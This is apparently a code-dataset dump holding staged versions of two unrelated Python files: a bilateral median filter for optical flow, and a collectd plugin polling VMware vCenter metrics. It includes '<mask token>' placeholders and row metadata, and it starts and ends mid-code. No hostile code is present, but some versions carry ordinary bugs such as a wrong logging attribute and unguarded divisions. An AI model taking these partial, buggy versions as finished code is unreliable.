exponent = distance_squared_difference / (2 *
sigma_distance * sigma_distance)
exponent += color_squared_difference / (2 * sigma_color *
sigma_color * color_channel_count)
occlusen_current = log_occlusen[y][x]
occlusen_compared = log_occlusen[y_compare][x_compare]
weigth = math.exp(-exponent + occlusen_compared -
occlusen_current)
weigths_list[counter] = weigth
helper_flow_x_list[counter] = flow[1][y_compare][x_compare]
helper_flow_y_list[counter] = flow[0][y_compare][x_compare]
counter += 1
n = counter
f_x = auxiliary_field[1][y][x]
f_y = auxiliary_field[0][y][x]
scalar = 1 / (2 * (weigth_auxiliary / weigth_filter))
for idx_1 in range(n + 1):
sum = 0
for idx_2 in range(idx_1):
sum -= weigths_list[idx_2]
for idx_2 in range(idx_1, n):
sum += weigths_list[idx_2]
helper_flow_x_list[n + idx_1] = f_x + scalar * sum
helper_flow_y_list[n + idx_1] = f_y + scalar * sum
result_flow[0][y][x] = median(helper_flow_y_list[:n * 2 + 1])
result_flow[1][y][x] = median(helper_flow_x_list[:n * 2 + 1])
print('result_flow')
print(result_flow.flatten())
return result_flow
| import math
import numpy as np
from statistics import median
from src.filter.median import quickselect_median
def bilateral_median_filter(flow, log_occlusen, auxiliary_field, image,
weigth_auxiliary, weigth_filter, sigma_distance=7, sigma_color=7 / 200,
filter_size=5):
"""
:param flow: np.float (YX,Height,Width)
:param occlusen: (Height, Width)
:param auxiliary_field: np.array(float) (Y_flow X_flow , Y_coord X_coord, Height, Width)
:param image: np.array(float) (ColorChannel, Height, Width)
:param weigth_auxiliary: float > 0
:param weigth_filter: float > 0
:param sigma_distance: float
:param sigma_color: float
:param filter_size: int
:return: flow field
"""
width = flow.shape[2]
height = flow.shape[1]
color_channel_count = flow.shape[0]
filter_half = int(filter_size / 2)
helper_list_size = filter_size ** 2 * 2
helper_flow_x_list = [0.0] * (helper_list_size + 1)
helper_flow_y_list = [0.0] * (helper_list_size + 1)
weigths_list = [0.0] * helper_list_size
result_flow = np.empty(shape=(2, height, width), dtype=float)
for y in range(height):
for x in range(width):
min_x_compare = max(0, x - filter_half)
max_x_compare = min(width, x + filter_half + 1)
min_y_compare = max(0, y - filter_half)
max_y_compare = min(height, y + filter_half + 1)
counter = 0
for y_compare in range(min_y_compare, max_y_compare):
for x_compare in range(min_x_compare, max_x_compare):
distance_squared_difference = (y - y_compare) ** 2 + (x -
x_compare) ** 2
color_squared_difference = 0
for channel in image:
color_squared_difference += (channel[y_compare][
x_compare] - channel[y][x]) ** 2
exponent = distance_squared_difference / (2 *
sigma_distance * sigma_distance)
exponent += color_squared_difference / (2 * sigma_color *
sigma_color * color_channel_count)
occlusen_current = log_occlusen[y][x]
occlusen_compared = log_occlusen[y_compare][x_compare]
weigth = math.exp(-exponent + occlusen_compared -
occlusen_current)
weigths_list[counter] = weigth
helper_flow_x_list[counter] = flow[1][y_compare][x_compare]
helper_flow_y_list[counter] = flow[0][y_compare][x_compare]
counter += 1
n = counter
f_x = auxiliary_field[1][y][x]
f_y = auxiliary_field[0][y][x]
scalar = 1 / (2 * (weigth_auxiliary / weigth_filter))
for idx_1 in range(n + 1):
sum = 0
for idx_2 in range(idx_1):
sum -= weigths_list[idx_2]
for idx_2 in range(idx_1, n):
sum += weigths_list[idx_2]
helper_flow_x_list[n + idx_1] = f_x + scalar * sum
helper_flow_y_list[n + idx_1] = f_y + scalar * sum
result_flow[0][y][x] = median(helper_flow_y_list[:n * 2 + 1])
result_flow[1][y][x] = median(helper_flow_x_list[:n * 2 + 1])
print('result_flow')
print(result_flow.flatten())
return result_flow
| import math
import numpy as np
from statistics import median
from src.filter.median import quickselect_median
def bilateral_median_filter(flow, log_occlusen, auxiliary_field, image, weigth_auxiliary, weigth_filter,
sigma_distance = 7, sigma_color =7 / 200, filter_size=5):
"""
:param flow: np.float (YX,Height,Width)
:param occlusen: (Height, Width)
:param auxiliary_field: np.array(float) (Y_flow X_flow , Y_coord X_coord, Height, Width)
:param image: np.array(float) (ColorChannel, Height, Width)
:param weigth_auxiliary: float > 0
:param weigth_filter: float > 0
:param sigma_distance: float
:param sigma_color: float
:param filter_size: int
:return: flow field
"""
width = flow.shape[2]
height = flow.shape[1]
color_channel_count = flow.shape[0]
filter_half = int(filter_size / 2)
helper_list_size = filter_size ** 2 * 2
helper_flow_x_list = [0.0] * (helper_list_size+1)
helper_flow_y_list = [0.0] * (helper_list_size+1)
weigths_list = [0.0] * helper_list_size
result_flow = np.empty(shape=(2, height, width), dtype=float)
for y in range(height):
for x in range(width):
min_x_compare = max(0, x - filter_half)
max_x_compare = min(width, x + filter_half + 1)
min_y_compare = max(0, y - filter_half)
max_y_compare = min(height, y + filter_half + 1)
counter = 0
for y_compare in range(min_y_compare, max_y_compare):
for x_compare in range(min_x_compare, max_x_compare):
distance_squared_difference = (y - y_compare) ** 2 + (x - x_compare) ** 2
color_squared_difference = 0
for channel in image:
color_squared_difference += (channel[y_compare][x_compare] - channel[y][x]) ** 2
exponent = distance_squared_difference / (2 * sigma_distance * sigma_distance)
exponent += color_squared_difference / (2 * sigma_color * sigma_color * color_channel_count)
occlusen_current = log_occlusen[y][x]
occlusen_compared = log_occlusen[y_compare][x_compare]
#weigth = math.exp(-exponent) * occlusen_compared / occlusen_current
weigth = math.exp(-exponent+occlusen_compared-occlusen_current)
weigths_list[counter] = weigth
helper_flow_x_list[counter] = flow[1][y_compare][x_compare]
helper_flow_y_list[counter] = flow[0][y_compare][x_compare]
counter += 1
# See A NEW MEDIAN FORMULA WITH APPLICATIONS TO PDE BASED DENOISING
# 3.13
n = counter
f_x = auxiliary_field[1][y][x]
f_y = auxiliary_field[0][y][x]
scalar = 1/(2*(weigth_auxiliary / weigth_filter))
for idx_1 in range(n+1):
sum = 0
for idx_2 in range(idx_1):
sum -= weigths_list[idx_2]
for idx_2 in range(idx_1, n):
sum += weigths_list[idx_2]
helper_flow_x_list[n + idx_1] = f_x + scalar * sum
helper_flow_y_list[n + idx_1] = f_y + scalar * sum
result_flow[0][y][x] = median(helper_flow_y_list[:n*2+1])
result_flow[1][y][x] = median(helper_flow_x_list[:n*2+1])
print("result_flow")
print(result_flow.flatten())
return result_flow
| null | [
0,
1,
2,
3
] |
613 | 55f76ae1ffe0fb2d2ca2c7a20aab45ffb00cf178 | <mask token>
class CollectdCollector(Collector):
"""
Handle dispatching statistics to collectd.
"""
NAME = 'vCenter'
def __init__(self, *args, **kwargs):
super(CollectdCollector, self).__init__(*args, **kwargs)
self.sleep_time = kwargs.get('sleep_time', 20)
def configure(self, conf):
"""
Callback to configure the plugin based on collectd's settings.
"""
for node in conf.children:
key = node.key
val = node.values[0]
if key == 'Vcenter':
self.vcenters = val.split()
elif key == 'Username':
self.username = val
elif key == 'Password':
self.password = val
elif key == 'Verbose':
self.verbose = bool(val)
elif key == 'Sleep':
self.sleep_time = int(val)
else:
self.log.warn('Unknown config key: %s' % (key,))
def read(self):
"""
Callback to send data back to collectd.
"""
self.log.debug('Beginning read callback')
info = self.poll()
if not info:
self.log.warn('No data received')
return
def dispatch_host(name, data):
"""
Helper to reduce duplication
"""
for key, value in data.items():
self.dispatch(name, 'host_%s' % (key,), name, value)
for vcenter, data in info.items():
for ds_name, ds_data in data['datastore'].items():
for key, value in ds_data.items():
self.dispatch(vcenter, 'ds_%s' % (key,), ds_name, value)
for dc_name, dc_data in data['datacenter'].items():
clusters = dc_data.pop('cluster', {})
hosts = dc_data.pop('host', {})
for key, value in dc_data.items():
self.dispatch(vcenter, 'dc_%s' % (key,), dc_name, value)
for c_name, c_data in clusters.items():
c_hosts = c_data.pop('host', {})
for key, value in c_data.items():
o_type = 'cluster_%s' % (key,)
self.dispatch(dc_name, o_type, c_name, value)
for ch_name, ch_data in c_hosts.items():
dispatch_host(ch_name, ch_data)
for h_name, h_data in hosts.items():
dispatch_host(h_name, h_data)
time.sleep(self.sleep_time)
def dispatch(self, host, obj_type, obj_instance, value):
"""
Helper to clean up metric sending.
:param str host:
The name of the host to which the metric belongs.
:param str obj_type:
The type of metric to report.
:param str obj_instance:
An instance to associate with the metric.
:param int value:
The value of the metric.
"""
val = collectd.Values(type='gauge', plugin=self.NAME, host=host)
val.type_instance = obj_type
val.plugin_instance = obj_instance
val.values = [value]
val.dispatch()
class CollectdHandler(logging.Handler):
"""
Expose collectd logger using standard Python logging.
"""
def __init__(self, verbose=False, *args, **kwargs):
self.verbose = verbose
super(CollectdHandler, self).__init__(*args, **kwargs)
if COLLECTD_ENABLED:
self._handler_map = {logging.CRITICAL: collectd.error, logging.
ERROR: collectd.error, logging.WARN: collectd.warning,
logging.INFO: collectd.info, logging.DEBUG: collectd.info}
def emit(self, record):
if not COLLECTD_ENABLED:
return
if record.level == logging.DEBUG and not self.verbose:
return
handler = self._handler_map[record.level]
handler(record.getMessage())
<mask token>
| <mask token>
class Collector(object):
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
def poll_host(self, server, obj, name):
"""
Gather metrics about a specific host.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the host.
:param str name:
Name of the host.
:returns:
A dictionary with several keys describing the current state of the
host, including CPU, memory, and virtual machine information.
"""
self.log.debug('found host: %s' % (name,))
status = 0
cpu_total = cpu_usage = cpu_percent = cpu_count = cpu_mhz_per_core = 0
mem_total = mem_usage = mem_percent = 0
vms_total = vms_running = vms_stopped = 0
if '.' in name and name.count('.') != 3:
name = name.split('.')[0]
props = server._retrieve_properties_traversal(property_names=[
'name', 'summary.overallStatus',
'summary.quickStats.overallMemoryUsage',
'summary.quickStats.overallCpuUsage',
'summary.hardware.memorySize', 'summary.hardware.numCpuCores',
'summary.hardware.cpuMhz'], from_node=obj, obj_type='HostSystem')
for prop_set in props:
for prop in prop_set.PropSet:
pn, pv = prop.Name, prop.Val
if pn == 'summary.overallStatus':
status = HOST_STATUS.index(pv)
elif pn == 'summary.quickStats.overallMemoryUsage':
mem_usage = pv
elif pn == 'summary.quickStats.overallCpuUsage':
cpu_usage = pv
elif pn == 'summary.hardware.memorySize':
mem_total = pv / MB
elif pn == 'summary.hardware.numCpuCores':
cpu_count = pv
elif pn == 'summary.hardware.cpuMhz':
cpu_mhz_per_core = pv
vms_total = len(server.get_registered_vms(obj))
vms_running = len(server.get_registered_vms(obj, status='poweredOn'))
vms_stopped = len(server.get_registered_vms(obj, status='poweredOff'))
cpu_total = cpu_count * cpu_mhz_per_core
cpu_percent = cpu_usage / float(cpu_total) * 100
mem_percent = mem_usage / float(mem_total) * 100
stats = {'status': status, 'cpu_total': cpu_total, 'cpu_usage':
cpu_usage, 'cpu_percent': cpu_percent, 'cpu_count': cpu_count,
'mem_total': mem_total, 'mem_usage': mem_usage, 'mem_percent':
mem_percent, 'vms_total': vms_total, 'vms_running': vms_running,
'vms_stopped': vms_stopped}
return stats
class CollectdCollector(Collector):
"""
Handle dispatching statistics to collectd.
"""
NAME = 'vCenter'
def __init__(self, *args, **kwargs):
super(CollectdCollector, self).__init__(*args, **kwargs)
self.sleep_time = kwargs.get('sleep_time', 20)
def configure(self, conf):
"""
Callback to configure the plugin based on collectd's settings.
"""
for node in conf.children:
key = node.key
val = node.values[0]
if key == 'Vcenter':
self.vcenters = val.split()
elif key == 'Username':
self.username = val
elif key == 'Password':
self.password = val
elif key == 'Verbose':
self.verbose = bool(val)
elif key == 'Sleep':
self.sleep_time = int(val)
else:
self.log.warn('Unknown config key: %s' % (key,))
def read(self):
"""
Callback to send data back to collectd.
"""
self.log.debug('Beginning read callback')
info = self.poll()
if not info:
self.log.warn('No data received')
return
def dispatch_host(name, data):
"""
Helper to reduce duplication
"""
for key, value in data.items():
self.dispatch(name, 'host_%s' % (key,), name, value)
for vcenter, data in info.items():
for ds_name, ds_data in data['datastore'].items():
for key, value in ds_data.items():
self.dispatch(vcenter, 'ds_%s' % (key,), ds_name, value)
for dc_name, dc_data in data['datacenter'].items():
clusters = dc_data.pop('cluster', {})
hosts = dc_data.pop('host', {})
for key, value in dc_data.items():
self.dispatch(vcenter, 'dc_%s' % (key,), dc_name, value)
for c_name, c_data in clusters.items():
c_hosts = c_data.pop('host', {})
for key, value in c_data.items():
o_type = 'cluster_%s' % (key,)
self.dispatch(dc_name, o_type, c_name, value)
for ch_name, ch_data in c_hosts.items():
dispatch_host(ch_name, ch_data)
for h_name, h_data in hosts.items():
dispatch_host(h_name, h_data)
time.sleep(self.sleep_time)
def dispatch(self, host, obj_type, obj_instance, value):
"""
Helper to clean up metric sending.
:param str host:
The name of the host to which the metric belongs.
:param str obj_type:
The type of metric to report.
:param str obj_instance:
An instance to associate with the metric.
:param int value:
The value of the metric.
"""
val = collectd.Values(type='gauge', plugin=self.NAME, host=host)
val.type_instance = obj_type
val.plugin_instance = obj_instance
val.values = [value]
val.dispatch()
class CollectdHandler(logging.Handler):
"""
Expose collectd logger using standard Python logging.
"""
def __init__(self, verbose=False, *args, **kwargs):
self.verbose = verbose
super(CollectdHandler, self).__init__(*args, **kwargs)
if COLLECTD_ENABLED:
self._handler_map = {logging.CRITICAL: collectd.error, logging.
ERROR: collectd.error, logging.WARN: collectd.warning,
logging.INFO: collectd.info, logging.DEBUG: collectd.info}
def emit(self, record):
if not COLLECTD_ENABLED:
return
if record.level == logging.DEBUG and not self.verbose:
return
handler = self._handler_map[record.level]
handler(record.getMessage())
<mask token>
| <mask token>
class Collector(object):
def __init__(self, vcenters, username=None, password=None, verbose=False):
"""
Configuration to poll a vCenter cluster for performance data.
:param list vcenters:
A list of one or more vCenter server IPs or hostnames.
:param str username:
The username to use to authenticate against the vCenter cluster.
:param str password:
The password associated with the specified user.
:param bool verbose: (optional)
Whether to enable verbose logging.
:param int sleep_time: (optional)
Number of seconds to wait between polls.
"""
self.vcenters = vcenters
self.username = username
self.password = password
self.verbose = verbose
if COLLECTD_ENABLED:
self.log = logging.getLogger()
self.log.addHandler(CollectdHandler(self.verbose))
else:
logging.basicConfig(level=logging.DEBUG)
self.log = logging.getLogger()
def poll(self):
"""
Collect current performance information.
"""
stats = {}
for vcenter in self.vcenters:
stats[vcenter] = self.poll_vcenter(vcenter)
return stats
def poll_vcenter(self, vcenter):
"""
Open a connection to the specified vCenter server and begin gathering
information about its datastores, datacenters, clusters, and hosts.
:param str vcenter:
The hostname or IP of a vCenter server.
:returns:
A dictionary containing information about the current state of
objects managed by the specified vCenter.
"""
self.log.debug('polling %s@%s' % (self.username, vcenter))
server = VIServer()
try:
server.connect(vcenter, self.username, self.password)
except:
self.log.exception('Failed to connect to %s' % (vcenter,))
return {}
stats = {'datastore': {}, 'datacenter': {}}
for obj, name in server.get_datastores().items():
ds_stats = self.poll_datastore(server, obj, name)
stats['datastore'][name] = ds_stats
datacenters = server.get_datacenters()
for obj, name in datacenters.items():
dc_stats = self.poll_datacenter(server, obj, name)
stats['datacenter'][name] = dc_stats
return stats
<mask token>
def poll_datacenter(self, server, obj, name):
"""
Gather metrics about a specific datacenter.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the datacenter.
:param str name:
Name of the datacenter.
:returns:
A dictionary with several keys describing the current state of the
datacenter. This dictionary includes information about each cluster
and host that is part of the specified datacenter.
"""
if '.' in name:
name = name.split('.')[0]
stats = self._poll_group('datacenter', server, obj, name)
cluster_host_stats = self._poll_group('cluster', server, obj, name)
for key, value in cluster_host_stats.items():
if key not in stats:
stats[key] = value
elif isinstance(stats[key], dict):
for c_key, c_value in value.items():
stats[key][c_key] = c_value
elif 'percent' in key:
stats[key] = (stats[key] + value) / 2
else:
stats[key] += value
return stats
def poll_cluster(self, server, obj, name):
"""
Gather metrics about a specific cluster.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the cluster.
:param str name:
Name of the cluster.
:returns:
A dictionary with several keys describing the current state of the
cluster. This dictionary includes information about each host that
is part of the specified cluster.
"""
return self._poll_group('cluster', server, obj, name)
def _poll_group(self, group_type, server, obj, name):
"""
Generic metrics gathering for datacenters and clusters.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for a datacenter or cluster.
:param str name:
Name of a datacenter or cluster.
:returns:
A dictionary with several keys describing the current state of the
datacenter/cluster. This dictionary includes information about each
cluster and/or host that is part of the specified object.
"""
if group_type == 'datacenter':
find_children = server.get_clusters
poll_child = self.poll_cluster
child_type = 'cluster'
elif group_type == 'cluster':
find_children = server.get_clusters
find_children = server.get_hosts
poll_child = self.poll_host
child_type = 'host'
self.log.debug('start querying %s: %s' % (group_type, name))
children = find_children(obj)
self.log.debug('finish querying %s: %s' % (group_type, name))
cpu_total = cpu_usage = cpu_percent = 0
mem_total = mem_usage = mem_percent = 0
vms_total = vms_running = vms_stopped = 0
child_stats = {}
for child_obj, child_name in children.items():
stats = poll_child(server, child_obj, child_name)
child_stats[child_name] = stats
cpu_total += stats['cpu_total']
cpu_usage += stats['cpu_usage']
mem_total += stats['mem_total']
mem_usage += stats['mem_usage']
vms_total += stats['vms_total']
vms_running += stats['vms_running']
vms_stopped += stats['vms_stopped']
if cpu_total > 0:
cpu_percent = cpu_usage / float(cpu_total) * 100
if mem_total > 0:
mem_percent = mem_usage / float(mem_total) * 100
group_stats = {'cpu_total': cpu_total, 'cpu_usage': cpu_usage,
'cpu_percent': cpu_percent, 'mem_total': mem_total, 'mem_usage':
mem_usage, 'mem_percent': mem_percent, 'vms_total': vms_total,
'vms_running': vms_running, 'vms_stopped': vms_stopped,
child_type: child_stats}
return group_stats
def poll_host(self, server, obj, name):
"""
Gather metrics about a specific host.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the host.
:param str name:
Name of the host.
:returns:
A dictionary with several keys describing the current state of the
host, including CPU, memory, and virtual machine information.
"""
self.log.debug('found host: %s' % (name,))
status = 0
cpu_total = cpu_usage = cpu_percent = cpu_count = cpu_mhz_per_core = 0
mem_total = mem_usage = mem_percent = 0
vms_total = vms_running = vms_stopped = 0
if '.' in name and name.count('.') != 3:
name = name.split('.')[0]
props = server._retrieve_properties_traversal(property_names=[
'name', 'summary.overallStatus',
'summary.quickStats.overallMemoryUsage',
'summary.quickStats.overallCpuUsage',
'summary.hardware.memorySize', 'summary.hardware.numCpuCores',
'summary.hardware.cpuMhz'], from_node=obj, obj_type='HostSystem')
for prop_set in props:
for prop in prop_set.PropSet:
pn, pv = prop.Name, prop.Val
if pn == 'summary.overallStatus':
status = HOST_STATUS.index(pv)
elif pn == 'summary.quickStats.overallMemoryUsage':
mem_usage = pv
elif pn == 'summary.quickStats.overallCpuUsage':
cpu_usage = pv
elif pn == 'summary.hardware.memorySize':
mem_total = pv / MB
elif pn == 'summary.hardware.numCpuCores':
cpu_count = pv
elif pn == 'summary.hardware.cpuMhz':
cpu_mhz_per_core = pv
vms_total = len(server.get_registered_vms(obj))
vms_running = len(server.get_registered_vms(obj, status='poweredOn'))
vms_stopped = len(server.get_registered_vms(obj, status='poweredOff'))
cpu_total = cpu_count * cpu_mhz_per_core
cpu_percent = cpu_usage / float(cpu_total) * 100
mem_percent = mem_usage / float(mem_total) * 100
stats = {'status': status, 'cpu_total': cpu_total, 'cpu_usage':
cpu_usage, 'cpu_percent': cpu_percent, 'cpu_count': cpu_count,
'mem_total': mem_total, 'mem_usage': mem_usage, 'mem_percent':
mem_percent, 'vms_total': vms_total, 'vms_running': vms_running,
'vms_stopped': vms_stopped}
return stats
class CollectdCollector(Collector):
"""
Handle dispatching statistics to collectd.
"""
NAME = 'vCenter'
def __init__(self, *args, **kwargs):
super(CollectdCollector, self).__init__(*args, **kwargs)
self.sleep_time = kwargs.get('sleep_time', 20)
def configure(self, conf):
"""
Callback to configure the plugin based on collectd's settings.
"""
for node in conf.children:
key = node.key
val = node.values[0]
if key == 'Vcenter':
self.vcenters = val.split()
elif key == 'Username':
self.username = val
elif key == 'Password':
self.password = val
elif key == 'Verbose':
self.verbose = bool(val)
elif key == 'Sleep':
self.sleep_time = int(val)
else:
self.log.warn('Unknown config key: %s' % (key,))
def read(self):
"""
Callback to send data back to collectd.
"""
self.log.debug('Beginning read callback')
info = self.poll()
if not info:
self.log.warn('No data received')
return
def dispatch_host(name, data):
"""
Helper to reduce duplication
"""
for key, value in data.items():
self.dispatch(name, 'host_%s' % (key,), name, value)
for vcenter, data in info.items():
for ds_name, ds_data in data['datastore'].items():
for key, value in ds_data.items():
self.dispatch(vcenter, 'ds_%s' % (key,), ds_name, value)
for dc_name, dc_data in data['datacenter'].items():
clusters = dc_data.pop('cluster', {})
hosts = dc_data.pop('host', {})
for key, value in dc_data.items():
self.dispatch(vcenter, 'dc_%s' % (key,), dc_name, value)
for c_name, c_data in clusters.items():
c_hosts = c_data.pop('host', {})
for key, value in c_data.items():
o_type = 'cluster_%s' % (key,)
self.dispatch(dc_name, o_type, c_name, value)
for ch_name, ch_data in c_hosts.items():
dispatch_host(ch_name, ch_data)
for h_name, h_data in hosts.items():
dispatch_host(h_name, h_data)
time.sleep(self.sleep_time)
def dispatch(self, host, obj_type, obj_instance, value):
"""
Helper to clean up metric sending.
:param str host:
The name of the host to which the metric belongs.
:param str obj_type:
The type of metric to report.
:param str obj_instance:
An instance to associate with the metric.
:param int value:
The value of the metric.
"""
val = collectd.Values(type='gauge', plugin=self.NAME, host=host)
val.type_instance = obj_type
val.plugin_instance = obj_instance
val.values = [value]
val.dispatch()
class CollectdHandler(logging.Handler):
"""
Expose collectd logger using standard Python logging.
"""
def __init__(self, verbose=False, *args, **kwargs):
self.verbose = verbose
super(CollectdHandler, self).__init__(*args, **kwargs)
if COLLECTD_ENABLED:
self._handler_map = {logging.CRITICAL: collectd.error, logging.
ERROR: collectd.error, logging.WARN: collectd.warning,
logging.INFO: collectd.info, logging.DEBUG: collectd.info}
def emit(self, record):
if not COLLECTD_ENABLED:
return
if record.level == logging.DEBUG and not self.verbose:
return
handler = self._handler_map[record.level]
handler(record.getMessage())
<mask token>
| <mask token>
class Collector(object):
def __init__(self, vcenters, username=None, password=None, verbose=False):
"""
Configuration to poll a vCenter cluster for performance data.
:param list vcenters:
A list of one or more vCenter server IPs or hostnames.
:param str username:
The username to use to authenticate against the vCenter cluster.
:param str password:
The password associated with the specified user.
:param bool verbose: (optional)
Whether to enable verbose logging.
:param int sleep_time: (optional)
Number of seconds to wait between polls.
"""
self.vcenters = vcenters
self.username = username
self.password = password
self.verbose = verbose
if COLLECTD_ENABLED:
self.log = logging.getLogger()
self.log.addHandler(CollectdHandler(self.verbose))
else:
logging.basicConfig(level=logging.DEBUG)
self.log = logging.getLogger()
def poll(self):
"""
Collect current performance information.
"""
stats = {}
for vcenter in self.vcenters:
stats[vcenter] = self.poll_vcenter(vcenter)
return stats
def poll_vcenter(self, vcenter):
"""
Open a connection to the specified vCenter server and begin gathering
information about its datastores, datacenters, clusters, and hosts.
:param str vcenter:
The hostname or IP of a vCenter server.
:returns:
A dictionary containing information about the current state of
objects managed by the specified vCenter.
"""
self.log.debug('polling %s@%s' % (self.username, vcenter))
server = VIServer()
try:
server.connect(vcenter, self.username, self.password)
except:
self.log.exception('Failed to connect to %s' % (vcenter,))
return {}
stats = {'datastore': {}, 'datacenter': {}}
for obj, name in server.get_datastores().items():
ds_stats = self.poll_datastore(server, obj, name)
stats['datastore'][name] = ds_stats
datacenters = server.get_datacenters()
for obj, name in datacenters.items():
dc_stats = self.poll_datacenter(server, obj, name)
stats['datacenter'][name] = dc_stats
return stats
def poll_datastore(self, server, obj, name):
"""
Gather metrics about a specific datastore.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the datastore.
:param str name:
Name of the datastore.
:returns:
A dictionary with four keys: capacity, free, used, and usage. The
capacity, free, and used space are measured in megabytes while the
usage is a percentage.
"""
capacity = free = usage = 0
try:
self.log.debug('query datastore %s' % (name,))
props = server._retrieve_properties_traversal(property_names=[
'name', 'summary.capacity', 'summary.freeSpace'], from_node
=obj, obj_type='Datastore')
for ps in props:
for prop in ps.PropSet:
pn, pv = prop.Name, prop.Val
if pn == 'summary.capacity':
capacity = pv / MB
elif pn == 'summary.freeSpace':
free = pv / MB
except:
self.log.exception('Failed to get datastore metrics')
if capacity > 0:
usage = (capacity - free) / float(capacity) * 100
return {'capacity': capacity, 'free': free, 'used': capacity - free,
'usage': usage}
def poll_datacenter(self, server, obj, name):
"""
Gather metrics about a specific datacenter.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the datacenter.
:param str name:
Name of the datacenter.
:returns:
A dictionary with several keys describing the current state of the
datacenter. This dictionary includes information about each cluster
and host that is part of the specified datacenter.
"""
if '.' in name:
name = name.split('.')[0]
stats = self._poll_group('datacenter', server, obj, name)
cluster_host_stats = self._poll_group('cluster', server, obj, name)
for key, value in cluster_host_stats.items():
if key not in stats:
stats[key] = value
elif isinstance(stats[key], dict):
for c_key, c_value in value.items():
stats[key][c_key] = c_value
elif 'percent' in key:
stats[key] = (stats[key] + value) / 2
else:
stats[key] += value
return stats
def poll_cluster(self, server, obj, name):
"""
Gather metrics about a specific cluster.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the cluster.
:param str name:
Name of the cluster.
:returns:
A dictionary with several keys describing the current state of the
cluster. This dictionary includes information about each host that
is part of the specified cluster.
"""
return self._poll_group('cluster', server, obj, name)
def _poll_group(self, group_type, server, obj, name):
"""
Generic metrics gathering for datacenters and clusters.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for a datacenter or cluster.
:param str name:
Name of a datacenter or cluster.
:returns:
A dictionary with several keys describing the current state of the
datacenter/cluster. This dictionary includes information about each
cluster and/or host that is part of the specified object.
"""
if group_type == 'datacenter':
find_children = server.get_clusters
poll_child = self.poll_cluster
child_type = 'cluster'
elif group_type == 'cluster':
find_children = server.get_clusters
find_children = server.get_hosts
poll_child = self.poll_host
child_type = 'host'
self.log.debug('start querying %s: %s' % (group_type, name))
children = find_children(obj)
self.log.debug('finish querying %s: %s' % (group_type, name))
cpu_total = cpu_usage = cpu_percent = 0
mem_total = mem_usage = mem_percent = 0
vms_total = vms_running = vms_stopped = 0
child_stats = {}
for child_obj, child_name in children.items():
stats = poll_child(server, child_obj, child_name)
child_stats[child_name] = stats
cpu_total += stats['cpu_total']
cpu_usage += stats['cpu_usage']
mem_total += stats['mem_total']
mem_usage += stats['mem_usage']
vms_total += stats['vms_total']
vms_running += stats['vms_running']
vms_stopped += stats['vms_stopped']
if cpu_total > 0:
cpu_percent = cpu_usage / float(cpu_total) * 100
if mem_total > 0:
mem_percent = mem_usage / float(mem_total) * 100
group_stats = {'cpu_total': cpu_total, 'cpu_usage': cpu_usage,
'cpu_percent': cpu_percent, 'mem_total': mem_total, 'mem_usage':
mem_usage, 'mem_percent': mem_percent, 'vms_total': vms_total,
'vms_running': vms_running, 'vms_stopped': vms_stopped,
child_type: child_stats}
return group_stats
def poll_host(self, server, obj, name):
"""
Gather metrics about a specific host.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the host.
:param str name:
Name of the host.
:returns:
A dictionary with several keys describing the current state of the
host, including CPU, memory, and virtual machine information.
"""
self.log.debug('found host: %s' % (name,))
status = 0
cpu_total = cpu_usage = cpu_percent = cpu_count = cpu_mhz_per_core = 0
mem_total = mem_usage = mem_percent = 0
vms_total = vms_running = vms_stopped = 0
if '.' in name and name.count('.') != 3:
name = name.split('.')[0]
props = server._retrieve_properties_traversal(property_names=[
'name', 'summary.overallStatus',
'summary.quickStats.overallMemoryUsage',
'summary.quickStats.overallCpuUsage',
'summary.hardware.memorySize', 'summary.hardware.numCpuCores',
'summary.hardware.cpuMhz'], from_node=obj, obj_type='HostSystem')
for prop_set in props:
for prop in prop_set.PropSet:
pn, pv = prop.Name, prop.Val
if pn == 'summary.overallStatus':
status = HOST_STATUS.index(pv)
elif pn == 'summary.quickStats.overallMemoryUsage':
mem_usage = pv
elif pn == 'summary.quickStats.overallCpuUsage':
cpu_usage = pv
elif pn == 'summary.hardware.memorySize':
mem_total = pv / MB
elif pn == 'summary.hardware.numCpuCores':
cpu_count = pv
elif pn == 'summary.hardware.cpuMhz':
cpu_mhz_per_core = pv
vms_total = len(server.get_registered_vms(obj))
vms_running = len(server.get_registered_vms(obj, status='poweredOn'))
vms_stopped = len(server.get_registered_vms(obj, status='poweredOff'))
cpu_total = cpu_count * cpu_mhz_per_core
cpu_percent = cpu_usage / float(cpu_total) * 100
mem_percent = mem_usage / float(mem_total) * 100
stats = {'status': status, 'cpu_total': cpu_total, 'cpu_usage':
cpu_usage, 'cpu_percent': cpu_percent, 'cpu_count': cpu_count,
'mem_total': mem_total, 'mem_usage': mem_usage, 'mem_percent':
mem_percent, 'vms_total': vms_total, 'vms_running': vms_running,
'vms_stopped': vms_stopped}
return stats
class CollectdCollector(Collector):
"""
Handle dispatching statistics to collectd.
"""
NAME = 'vCenter'
def __init__(self, *args, **kwargs):
super(CollectdCollector, self).__init__(*args, **kwargs)
self.sleep_time = kwargs.get('sleep_time', 20)
def configure(self, conf):
"""
Callback to configure the plugin based on collectd's settings.
"""
for node in conf.children:
key = node.key
val = node.values[0]
if key == 'Vcenter':
self.vcenters = val.split()
elif key == 'Username':
self.username = val
elif key == 'Password':
self.password = val
elif key == 'Verbose':
self.verbose = bool(val)
elif key == 'Sleep':
self.sleep_time = int(val)
else:
self.log.warn('Unknown config key: %s' % (key,))
def read(self):
"""
Callback to send data back to collectd.
"""
self.log.debug('Beginning read callback')
info = self.poll()
if not info:
self.log.warn('No data received')
return
def dispatch_host(name, data):
"""
Helper to reduce duplication
"""
for key, value in data.items():
self.dispatch(name, 'host_%s' % (key,), name, value)
for vcenter, data in info.items():
for ds_name, ds_data in data['datastore'].items():
for key, value in ds_data.items():
self.dispatch(vcenter, 'ds_%s' % (key,), ds_name, value)
